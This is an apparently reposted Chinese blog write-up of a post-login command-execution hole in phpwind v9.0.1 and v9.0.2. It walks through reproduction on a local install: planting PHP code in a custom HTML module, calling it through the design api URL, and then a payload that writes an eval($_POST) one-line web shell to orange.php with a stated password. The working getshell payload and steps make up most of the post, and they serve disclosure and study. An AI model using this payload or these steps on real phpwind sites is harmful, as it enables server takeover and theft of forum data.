phpwind index.php?m=design&c=api,phpwind v9存在命令执行漏洞(登陆后台)

已知漏洞:https://www.seebug.org/vuldb/ssvid-94465

phpwind v9最新版存在命令执行漏洞(登陆后台)

Phpwind_v9.0.2(最新版),phpwind_v9.0.1

命令执行

高危(getshell)

phpwind是一个基于PHP和MySQL的开源社区程序,是国内最受欢迎的通用型论坛程序之一。社区可提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活需求。Phpwind_v9.0.2(最新版),phpwind_v9.0.1版本登陆后台,调用代码,存在命令执行漏洞,进而getshell。

攻击者可获取网站社区的数据库信息,可发布信息等。

漏洞验证

版本phpwind_v9.0.2,登陆后台,门户-->模块管理-->调用管理-->添加模块,新增模块-->选择自定义html,下一步,写入<?php phpinfo(); ?> ,然后调用代码。

选择调用站外代码xml,复制连接,访问,调用xml,json都可以。去掉xml,会执行phpinfo();

该漏洞出现的文件路径为:软件安装根目录\src\applications\design\controller

\ApiController.php,具体代码位置如下图所示

9c30b8c2bd8aeb0176e04ae20a0da30b.png

默认安装,需要登陆后台

1,本地搭建的环境phpwind_v9.0.2,源码下载(链接: https://pan.baidu.com/s/1J8BaaOEvCDU0O3MyHKgKQQ密码: qrgg)。实验用的是phpwind_v9.0.2环境,phpwind_v9.0.1的方法是一样的(源码下载链接: https://pan.baidu.com/s/1lQpLGChPiKcxhujiLtWp7Q密码: ydj3)。下载好默认安装就好,如果打不开首页,须将.htaccess删除。

2,本地进行实验,默认安装,登陆后台(admin.php)(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/admin.php),门户-->模块管理-->调用管理-->添加模块,新增模块-->选择自定义html,下一步,写入<?php phpinfo(); ?> ,然后调用代码。

8b7cd313a5454c47843018c7c6a06336.png

8569831b7374dfacda04c2f2267161dd.png

12f0206f45f7294e5af9ecd7ae4cc27f.png

a51e5937604eea5c8b12eb4891889d02.png

57515f18176d438ee96739493fad641a.png

3,选择调用站外代,复制连接,访问,调用xml,json都可以。以xml为例(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/index.php?m=design&c=api&token=Y6s5Q0iwMq&id=4&format=xml),

dbb0e678316f690e60f6d95871bda7e2.png

去掉xml,会执行phpinfo

3a01e9a68024aef4a5f7fbd1d486553e.png

c139c76407b0e4e4768699d5cade68ef.png

4,将代码换成(<?php fputs(fopen("orange.php","w"),"<?eval(\$_POST[orange]);?>");?>)

新建一个orange.php文件,将一句话写入orange.php文件。

(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/index.php?m=design&c=api&token=tbB6LdMe6q&id=5&format=xml)

4865cf299b590906b870f76d790a9cdf.png

bb1e352dd36eedb3e4f06535c1c45dc8.png

c1464197499a781c8c75ef59d9e55bed.png

5,(http://127.0.0.1/test/phpwind_v9.0.2_utf8/phpwind_v9.0.2_utf8_20170401/orange.php),密码orange

源码下载(链接: https://pan.baidu.com/s/1J8BaaOEvCDU0O3MyHKgKQQ 密码: qrgg)

本文链接(http://www.cnblogs.com/Oran9e/p/8681391.html),转载请注明。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值